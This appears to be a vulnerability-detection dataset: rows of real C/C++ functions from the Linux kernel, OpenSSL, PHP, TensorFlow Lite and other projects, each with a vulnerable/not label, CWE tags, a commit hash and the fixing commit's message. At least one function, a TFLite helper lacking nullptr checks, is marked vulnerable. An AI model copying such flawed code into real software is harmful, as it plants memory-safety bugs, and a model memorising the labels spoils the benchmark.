xfrm: policy: check policy direction value The 'dir' parameter in xfrm_migrate() is a user-controlled byte which is used as an array index. This can lead to an out-of-bound access, kernel lockup and DoS. Add a check for the 'dir' value. This fixes CVE-2017-11600. References: https://bugzilla.redhat.com/show_bug.cgi?id=1474928 Fixes: 80c9abaabf42 ("[XFRM]: Extension for dynamic update of endpoint address(es)") Cc: <[email protected]> # v2.6.21-rc1 Reported-by: "bo Zhang" <[email protected]> Signed-off-by: Vladis Dronov <[email protected]> Signed-off-by: Steffen Klassert <[email protected]>
int ssl2_put_cipher_by_char(const SSL_CIPHER *c, unsigned char *p) { long l; if (p != NULL) { l=c->id; if ((l & 0xff000000) != 0x02000000 && l != SSL3_CK_FALLBACK_SCSV) return(0); p[0]=((unsigned char)(l>>16L))&0xFF; p[1]=((unsigned char)(l>> 8L))&0xFF; p[2]=((unsigned char)(l ))&0xFF; } return(3); }
0
[ "CWE-310" ]
openssl
cf6da05304d554aaa885151451aa4ecaa977e601
31,511,907,699,976,810,000,000,000,000,000,000,000
14
Support TLS_FALLBACK_SCSV. Reviewed-by: Stephen Henson <[email protected]>
enable_progress(void) { term.lines[term.curs.y]->lattr |= LATTR_PROGRESS; }
0
[ "CWE-703", "CWE-770" ]
mintty
bd52109993440b6996760aaccb66e68e782762b9
63,053,995,155,576,900,000,000,000,000,000,000,000
4
tame some window operations, just in case
TfLiteStatus ReverseSequenceHelper(TfLiteContext* context, TfLiteNode* node) { const TfLiteTensor* seq_lengths_tensor = GetInput(context, node, kSeqLengthsTensor); switch (seq_lengths_tensor->type) { case kTfLiteInt32: { return ReverseSequenceImpl<T, int32_t>(context, node); } case kTfLiteInt64: { return ReverseSequenceImpl<T, int64_t>(context, node); } default: { context->ReportError( context, "Seq_lengths type '%s' is not supported by reverse_sequence.", TfLiteTypeGetName(seq_lengths_tensor->type)); return kTfLiteError; } } return kTfLiteOk; }
1
[ "CWE-125", "CWE-787" ]
tensorflow
1970c2158b1ffa416d159d03c3370b9a462aee35
326,008,880,457,837,000,000,000,000,000,000,000,000
20
[tflite]: Insert `nullptr` checks when obtaining tensors. As part of ongoing refactoring, `tflite::GetInput`, `tflite::GetOutput`, `tflite::GetTemporary` and `tflite::GetIntermediates` will return `nullptr` in some cases. Hence, we insert the `nullptr` checks on all usages. We also insert `nullptr` checks on usages of `tflite::GetVariableInput` and `tflite::GetOptionalInputTensor` but only in the cases where there is no obvious check that `nullptr` is acceptable (that is, we only insert the check for the output of these two functions if the tensor is accessed as if it is always not `nullptr`). PiperOrigin-RevId: 332521299 Change-Id: I29af455bcb48d0b92e58132d951a3badbd772d56
SSL_METHOD *ssl_bad_method(int ver) { SSLerr(SSL_F_SSL_BAD_METHOD,ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED); return(NULL); }
0
[]
openssl
ee2ffc279417f15fef3b1073c7dc81a908991516
203,431,430,310,870,630,000,000,000,000,000,000,000
5
Add Next Protocol Negotiation.
int sg_scsi_ioctl(struct request_queue *q, struct gendisk *disk, fmode_t mode, struct scsi_ioctl_command __user *sic) { struct request *rq; int err; unsigned int in_len, out_len, bytes, opcode, cmdlen; char *buffer = NULL, sense[SCSI_SENSE_BUFFERSIZE]; if (!sic) return -EINVAL; /* * get in an out lengths, verify they don't exceed a page worth of data */ if (get_user(in_len, &sic->inlen)) return -EFAULT; if (get_user(out_len, &sic->outlen)) return -EFAULT; if (in_len > PAGE_SIZE || out_len > PAGE_SIZE) return -EINVAL; if (get_user(opcode, sic->data)) return -EFAULT; bytes = max(in_len, out_len); if (bytes) { buffer = kzalloc(bytes, q->bounce_gfp | GFP_USER| __GFP_NOWARN); if (!buffer) return -ENOMEM; } rq = blk_get_request(q, in_len ? WRITE : READ, __GFP_WAIT); cmdlen = COMMAND_SIZE(opcode); /* * get command and data to send to device, if any */ err = -EFAULT; rq->cmd_len = cmdlen; if (copy_from_user(rq->cmd, sic->data, cmdlen)) goto error; if (in_len && copy_from_user(buffer, sic->data + cmdlen, in_len)) goto error; err = blk_verify_command(rq->cmd, mode & FMODE_WRITE); if (err) goto error; /* default. possible overriden later */ rq->retries = 5; switch (opcode) { case SEND_DIAGNOSTIC: case FORMAT_UNIT: rq->timeout = FORMAT_UNIT_TIMEOUT; rq->retries = 1; break; case START_STOP: rq->timeout = START_STOP_TIMEOUT; break; case MOVE_MEDIUM: rq->timeout = MOVE_MEDIUM_TIMEOUT; break; case READ_ELEMENT_STATUS: rq->timeout = READ_ELEMENT_STATUS_TIMEOUT; break; case READ_DEFECT_DATA: rq->timeout = READ_DEFECT_DATA_TIMEOUT; rq->retries = 1; break; default: rq->timeout = BLK_DEFAULT_SG_TIMEOUT; break; } if (bytes && blk_rq_map_kern(q, rq, buffer, bytes, __GFP_WAIT)) { err = DRIVER_ERROR << 24; goto out; } memset(sense, 0, sizeof(sense)); rq->sense = sense; rq->sense_len = 0; rq->cmd_type = REQ_TYPE_BLOCK_PC; blk_execute_rq(q, disk, rq, 0); out: err = rq->errors & 0xff; /* only 8 bit SCSI status */ if (err) { if (rq->sense_len && rq->sense) { bytes = (OMAX_SB_LEN > rq->sense_len) ? rq->sense_len : OMAX_SB_LEN; if (copy_to_user(sic->data, rq->sense, bytes)) err = -EFAULT; } } else { if (copy_to_user(sic->data, buffer, out_len)) err = -EFAULT; } error: kfree(buffer); blk_put_request(rq); return err; }
0
[ "CWE-284", "CWE-264" ]
linux
0bfc96cb77224736dfa35c3c555d37b3646ef35e
70,536,527,237,476,120,000,000,000,000,000,000,000
108
block: fail SCSI passthrough ioctls on partition devices Linux allows executing the SG_IO ioctl on a partition or LVM volume, and will pass the command to the underlying block device. This is well-known, but it is also a large security problem when (via Unix permissions, ACLs, SELinux or a combination thereof) a program or user needs to be granted access only to part of the disk. This patch lets partitions forward a small set of harmless ioctls; others are logged with printk so that we can see which ioctls are actually sent. In my tests only CDROM_GET_CAPABILITY actually occurred. Of course it was being sent to a (partition on a) hard disk, so it would have failed with ENOTTY and the patch isn't changing anything in practice. Still, I'm treating it specially to avoid spamming the logs. In principle, this restriction should include programs running with CAP_SYS_RAWIO. If for example I let a program access /dev/sda2 and /dev/sdb, it still should not be able to read/write outside the boundaries of /dev/sda2 independent of the capabilities. However, for now programs with CAP_SYS_RAWIO will still be allowed to send the ioctls. Their actions will still be logged. This patch does not affect the non-libata IDE driver. That driver however already tests for bd != bd->bd_contains before issuing some ioctl; it could be restricted further to forbid these ioctls even for programs running with CAP_SYS_ADMIN/CAP_SYS_RAWIO. Cc: [email protected] Cc: Jens Axboe <[email protected]> Cc: James Bottomley <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]> [ Make it also print the command name when warning - Linus ] Signed-off-by: Linus Torvalds <[email protected]>
void ip6_flush_pending_frames(struct sock *sk) { struct inet_sock *inet = inet_sk(sk); struct ipv6_pinfo *np = inet6_sk(sk); struct sk_buff *skb; while ((skb = __skb_dequeue_tail(&sk->sk_write_queue)) != NULL) { IP6_INC_STATS(IPSTATS_MIB_OUTDISCARDS); kfree_skb(skb); } inet->cork.flags &= ~IPCORK_OPT; if (np->cork.opt) { kfree(np->cork.opt); np->cork.opt = NULL; } if (np->cork.rt) { dst_release(&np->cork.rt->u.dst); np->cork.rt = NULL; inet->cork.flags &= ~IPCORK_ALLFRAG; } memset(&inet->cork.fl, 0, sizeof(inet->cork.fl)); }
0
[]
linux
e89e9cf539a28df7d0eb1d0a545368e9920b34ac
135,682,261,570,317,940,000,000,000,000,000,000,000
24
[IPv4/IPv6]: UFO Scatter-gather approach Attached is kernel patch for UDP Fragmentation Offload (UFO) feature. 1. This patch incorporate the review comments by Jeff Garzik. 2. Renamed USO as UFO (UDP Fragmentation Offload) 3. udp sendfile support with UFO This patches uses scatter-gather feature of skb to generate large UDP datagram. Below is a "how-to" on changes required in network device driver to use the UFO interface. UDP Fragmentation Offload (UFO) Interface: ------------------------------------------- UFO is a feature wherein the Linux kernel network stack will offload the IP fragmentation functionality of large UDP datagram to hardware. This will reduce the overhead of stack in fragmenting the large UDP datagram to MTU sized packets 1) Drivers indicate their capability of UFO using dev->features |= NETIF_F_UFO | NETIF_F_HW_CSUM | NETIF_F_SG NETIF_F_HW_CSUM is required for UFO over ipv6. 2) UFO packet will be submitted for transmission using driver xmit routine. UFO packet will have a non-zero value for "skb_shinfo(skb)->ufo_size" skb_shinfo(skb)->ufo_size will indicate the length of data part in each IP fragment going out of the adapter after IP fragmentation by hardware. skb->data will contain MAC/IP/UDP header and skb_shinfo(skb)->frags[] contains the data payload. The skb->ip_summed will be set to CHECKSUM_HW indicating that hardware has to do checksum calculation. Hardware should compute the UDP checksum of complete datagram and also ip header checksum of each fragmented IP packet. For IPV6 the UFO provides the fragment identification-id in skb_shinfo(skb)->ip6_frag_id. The adapter should use this ID for generating IPv6 fragments. Signed-off-by: Ananda Raju <[email protected]> Signed-off-by: Rusty Russell <[email protected]> (forwarded) Signed-off-by: Arnaldo Carvalho de Melo <[email protected]>
PHP_FUNCTION(imagefilter) { zval *tmp; typedef void (*image_filter)(INTERNAL_FUNCTION_PARAMETERS); zend_long filtertype; image_filter filters[] = { php_image_filter_negate , php_image_filter_grayscale, php_image_filter_brightness, php_image_filter_contrast, php_image_filter_colorize, php_image_filter_edgedetect, php_image_filter_emboss, php_image_filter_gaussian_blur, php_image_filter_selective_blur, php_image_filter_mean_removal, php_image_filter_smooth, php_image_filter_pixelate }; if (ZEND_NUM_ARGS() < 2 || ZEND_NUM_ARGS() > IMAGE_FILTER_MAX_ARGS) { WRONG_PARAM_COUNT; } else if (zend_parse_parameters(2, "rl", &tmp, &filtertype) == FAILURE) { return; } if (filtertype >= 0 && filtertype <= IMAGE_FILTER_MAX) { filters[filtertype](INTERNAL_FUNCTION_PARAM_PASSTHRU); } }
0
[ "CWE-787" ]
php-src
28022c9b1fd937436ab67bb3d61f652c108baf96
66,341,866,631,054,650,000,000,000,000,000,000,000
32
Fix bug#72697 - select_colors write out-of-bounds (cherry picked from commit b6f13a5ef9d6280cf984826a5de012a32c396cd4) Conflicts: ext/gd/gd.c
PHP_FUNCTION(imagecolorset) { zval *IM; long color, red, green, blue; int col; gdImagePtr im; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rllll", &IM, &color, &red, &green, &blue) == FAILURE) { return; } ZEND_FETCH_RESOURCE(im, gdImagePtr, &IM, -1, "Image", le_gd); col = color; if (col >= 0 && col < gdImageColorsTotal(im)) { im->red[col] = red; im->green[col] = green; im->blue[col] = blue; } else { RETURN_FALSE; } }
0
[]
php-src
ce96fd6b0761d98353761bf78d5bfb55291179fd
258,894,749,962,681,980,000,000,000,000,000,000,000
23
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs. Patch by Rasmus
static void vmx_complete_interrupts(struct vcpu_vmx *vmx) { u32 exit_intr_info; u32 idt_vectoring_info = vmx->idt_vectoring_info; bool unblock_nmi; u8 vector; int type; bool idtv_info_valid; exit_intr_info = vmcs_read32(VM_EXIT_INTR_INFO); vmx->exit_reason = vmcs_read32(VM_EXIT_REASON); /* Handle machine checks before interrupts are enabled */ if ((vmx->exit_reason == EXIT_REASON_MCE_DURING_VMENTRY) || (vmx->exit_reason == EXIT_REASON_EXCEPTION_NMI && is_machine_check(exit_intr_info))) kvm_machine_check(); /* We need to handle NMIs before interrupts are enabled */ if ((exit_intr_info & INTR_INFO_INTR_TYPE_MASK) == INTR_TYPE_NMI_INTR && (exit_intr_info & INTR_INFO_VALID_MASK)) { kvm_before_handle_nmi(&vmx->vcpu); asm("int $2"); kvm_after_handle_nmi(&vmx->vcpu); } idtv_info_valid = idt_vectoring_info & VECTORING_INFO_VALID_MASK; if (cpu_has_virtual_nmis()) { unblock_nmi = (exit_intr_info & INTR_INFO_UNBLOCK_NMI) != 0; vector = exit_intr_info & INTR_INFO_VECTOR_MASK; /* * SDM 3: 27.7.1.2 (September 2008) * Re-set bit "block by NMI" before VM entry if vmexit caused by * a guest IRET fault. * SDM 3: 23.2.2 (September 2008) * Bit 12 is undefined in any of the following cases: * If the VM exit sets the valid bit in the IDT-vectoring * information field. * If the VM exit is due to a double fault. */ if ((exit_intr_info & INTR_INFO_VALID_MASK) && unblock_nmi && vector != DF_VECTOR && !idtv_info_valid) vmcs_set_bits(GUEST_INTERRUPTIBILITY_INFO, GUEST_INTR_STATE_NMI); } else if (unlikely(vmx->soft_vnmi_blocked)) vmx->vnmi_blocked_time += ktime_to_ns(ktime_sub(ktime_get(), vmx->entry_time)); vmx->vcpu.arch.nmi_injected = false; kvm_clear_exception_queue(&vmx->vcpu); kvm_clear_interrupt_queue(&vmx->vcpu); if (!idtv_info_valid) return; vector = idt_vectoring_info & VECTORING_INFO_VECTOR_MASK; type = idt_vectoring_info & VECTORING_INFO_TYPE_MASK; switch (type) { case INTR_TYPE_NMI_INTR: vmx->vcpu.arch.nmi_injected = true; /* * SDM 3: 27.7.1.2 (September 2008) * Clear bit "block by NMI" before VM entry if a NMI * delivery faulted. */ vmcs_clear_bits(GUEST_INTERRUPTIBILITY_INFO, GUEST_INTR_STATE_NMI); break; case INTR_TYPE_SOFT_EXCEPTION: vmx->vcpu.arch.event_exit_inst_len = vmcs_read32(VM_EXIT_INSTRUCTION_LEN); /* fall through */ case INTR_TYPE_HARD_EXCEPTION: if (idt_vectoring_info & VECTORING_INFO_DELIVER_CODE_MASK) { u32 err = vmcs_read32(IDT_VECTORING_ERROR_CODE); kvm_queue_exception_e(&vmx->vcpu, vector, err); } else kvm_queue_exception(&vmx->vcpu, vector); break; case INTR_TYPE_SOFT_INTR: vmx->vcpu.arch.event_exit_inst_len = vmcs_read32(VM_EXIT_INSTRUCTION_LEN); /* fall through */ case INTR_TYPE_EXT_INTR: kvm_queue_interrupt(&vmx->vcpu, vector, type == INTR_TYPE_SOFT_INTR); break; default: break; } }
0
[ "CWE-400" ]
linux-2.6
9581d442b9058d3699b4be568b6e5eae38a41493
338,978,536,654,989,500,000,000,000,000,000,000,000
94
KVM: Fix fs/gs reload oops with invalid ldt kvm reloads the host's fs and gs blindly, however the underlying segment descriptors may be invalid due to the user modifying the ldt after loading them. Fix by using the safe accessors (loadsegment() and load_gs_index()) instead of home grown unsafe versions. This is CVE-2010-3698. KVM-Stable-Tag. Signed-off-by: Avi Kivity <[email protected]> Signed-off-by: Marcelo Tosatti <[email protected]>
test_full (void) { g_autoptr(GError) error = NULL; g_autoptr(FlatpakBwrap) bwrap = flatpak_bwrap_new (NULL); g_autoptr(FlatpakExports) exports = flatpak_exports_new (); g_autofree gchar *subdir = g_build_filename (testdir, "test_full", NULL); g_autofree gchar *expose_rw = g_build_filename (subdir, "expose-rw", NULL); g_autofree gchar *in_expose_rw = g_build_filename (subdir, "expose-rw", "file", NULL); g_autofree gchar *dangling_link_in_expose_rw = g_build_filename (subdir, "expose-rw", "dangling", NULL); g_autofree gchar *expose_ro = g_build_filename (subdir, "expose-ro", NULL); g_autofree gchar *in_expose_ro = g_build_filename (subdir, "expose-ro", "file", NULL); g_autofree gchar *hide = g_build_filename (subdir, "hide", NULL); g_autofree gchar *dont_hide = g_build_filename (subdir, "dont-hide", NULL); g_autofree gchar *hide_below_expose = g_build_filename (subdir, "expose-ro", "hide-me", NULL); g_autofree gchar *enoent = g_build_filename (subdir, "ENOENT", NULL); g_autofree gchar *one = g_build_filename (subdir, "1", NULL); g_autofree gchar *rel_link = g_build_filename (subdir, "1", "rel-link", NULL); g_autofree gchar *abs_link = g_build_filename (subdir, "1", "abs-link", NULL); g_autofree gchar *in_abs_link = g_build_filename (subdir, "1", "abs-link", "file", NULL); g_autofree gchar *dangling = g_build_filename (subdir, "1", "dangling", NULL); g_autofree gchar *in_dangling = g_build_filename (subdir, "1", "dangling", "file", NULL); g_autofree gchar *abs_target = g_build_filename (subdir, "2", "abs-target", NULL); g_autofree gchar *target = g_build_filename (subdir, "2", "target", NULL); g_autofree gchar *create_dir = g_build_filename (subdir, "create-dir", NULL); g_autofree gchar *create_dir2 = g_build_filename (subdir, "create-dir2", NULL); gsize i; glnx_shutil_rm_rf_at (-1, subdir, NULL, &error); if (error != NULL) { g_assert_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND); g_clear_error (&error); } if (g_mkdir_with_parents (expose_rw, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (expose_ro, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (hide_below_expose, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (hide, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (dont_hide, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (dont_hide, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (abs_target, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (target, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (one, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (create_dir, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (symlink (abs_target, abs_link) != 0) g_error ("symlink: %s", g_strerror (errno)); if (symlink ("nope", dangling) != 0) g_error ("symlink: %s", g_strerror (errno)); if (symlink ("nope", dangling_link_in_expose_rw) != 0) g_error ("symlink: %s", g_strerror (errno)); if (symlink ("../2/target", rel_link) != 0) g_error ("symlink: %s", g_strerror (errno)); flatpak_exports_add_host_etc_expose (exports, FLATPAK_FILESYSTEM_MODE_READ_WRITE); flatpak_exports_add_host_os_expose (exports, FLATPAK_FILESYSTEM_MODE_READ_ONLY); flatpak_exports_add_path_expose (exports, FLATPAK_FILESYSTEM_MODE_READ_WRITE, expose_rw); flatpak_exports_add_path_expose (exports, FLATPAK_FILESYSTEM_MODE_READ_ONLY, expose_ro); flatpak_exports_add_path_tmpfs (exports, hide_below_expose); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_NONE, hide); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_READ_ONLY, dont_hide); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_READ_ONLY, enoent); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_READ_WRITE, rel_link); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_READ_WRITE, abs_link); flatpak_exports_add_path_dir (exports, create_dir); flatpak_exports_add_path_dir (exports, create_dir2); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, expose_rw), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, expose_ro), ==, FLATPAK_FILESYSTEM_MODE_READ_ONLY); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, hide_below_expose), ==, FLATPAK_FILESYSTEM_MODE_NONE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, hide), ==, FLATPAK_FILESYSTEM_MODE_NONE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, dont_hide), ==, FLATPAK_FILESYSTEM_MODE_READ_ONLY); /* It knows enoent didn't really exist */ g_assert_cmpuint (flatpak_exports_path_get_mode (exports, enoent), ==, FLATPAK_FILESYSTEM_MODE_NONE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, abs_link), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, rel_link), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); /* Files the app would be allowed to create count as exposed */ g_assert_cmpuint (flatpak_exports_path_get_mode (exports, in_expose_ro), ==, FLATPAK_FILESYSTEM_MODE_NONE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, in_expose_rw), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, in_abs_link), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, in_dangling), ==, FLATPAK_FILESYSTEM_MODE_NONE); flatpak_bwrap_add_arg (bwrap, "bwrap"); flatpak_exports_append_bwrap_args (exports, bwrap); flatpak_bwrap_finish (bwrap); print_bwrap (bwrap); i = 0; g_assert_cmpuint (i, <, bwrap->argv->len); g_assert_cmpstr (bwrap->argv->pdata[i++], ==, "bwrap"); i = assert_next_is_symlink (bwrap, i, abs_target, abs_link); i = assert_next_is_symlink (bwrap, i, "../2/target", rel_link); i = assert_next_is_bind (bwrap, i, "--bind", abs_target, abs_target); i = assert_next_is_bind (bwrap, i, "--bind", target, target); i = assert_next_is_dir (bwrap, i, create_dir); /* create_dir2 is not currently created with --dir inside the container * because it doesn't exist outside the container. * (Is this correct? For now, tolerate either way) */ if (i + 2 < bwrap->argv->len && g_strcmp0 (bwrap->argv->pdata[i], "--dir") == 0 && g_strcmp0 (bwrap->argv->pdata[i + 1], create_dir2) == 0) i += 2; i = assert_next_is_bind (bwrap, i, "--ro-bind", dont_hide, dont_hide); i = assert_next_is_bind (bwrap, i, "--ro-bind", expose_ro, expose_ro); /* We don't create a FAKE_MODE_TMPFS in the container unless there is * a directory on the host to mount it on. * Hiding $subdir/expose-ro/hide-me has to use --tmpfs because * $subdir/expose-ro *is* exposed. */ i = assert_next_is_tmpfs (bwrap, i, hide_below_expose); i = assert_next_is_bind (bwrap, i, "--bind", expose_rw, expose_rw); /* Hiding $subdir/hide just uses --dir, because $subdir is not * exposed. */ i = assert_next_is_dir (bwrap, i, hide); while (i < bwrap->argv->len && bwrap->argv->pdata[i] != NULL) { /* An unknown number of --bind, --ro-bind and --symlink, * depending how your /usr and /etc are set up. * About the only thing we can say is that they are in threes. */ g_assert_cmpuint (i++, <, bwrap->argv->len); g_assert_cmpuint (i++, <, bwrap->argv->len); g_assert_cmpuint (i++, <, bwrap->argv->len); } g_assert_cmpuint (i, ==, bwrap->argv->len - 1); g_assert_cmpstr (bwrap->argv->pdata[i++], ==, NULL); g_assert_cmpuint (i, ==, bwrap->argv->len); glnx_shutil_rm_rf_at (-1, subdir, NULL, &error); if (error != NULL) { g_assert_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND); g_clear_error (&error); } }
0
[ "CWE-74" ]
flatpak
4108e022452303093d8b90c838695a0476cb09c7
139,559,460,823,970,690,000,000,000,000,000,000,000
204
context: Add --unset-env option and a corresponding override This follows up from GHSA-4ppf-fxf6-vxg2 to fix missing functionality that I noticed while resolving that vulnerability, but is not required for fixing the vulnerability. Signed-off-by: Simon McVittie <[email protected]>
inline int _vsnprintf(char *const s, const size_t size, const char *const format, va_list ap) { int result = -1; cimg::mutex(6); if (size) result = _vsnprintf_s(s,size,_TRUNCATE,format,ap); if (result==-1) result = _vscprintf(format,ap); cimg::mutex(6,0); return result; }
0
[ "CWE-125" ]
CImg
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
16,509,426,807,763,476,000,000,000,000,000,000,000
8
Fix other issues in 'CImg<T>::load_bmp()'.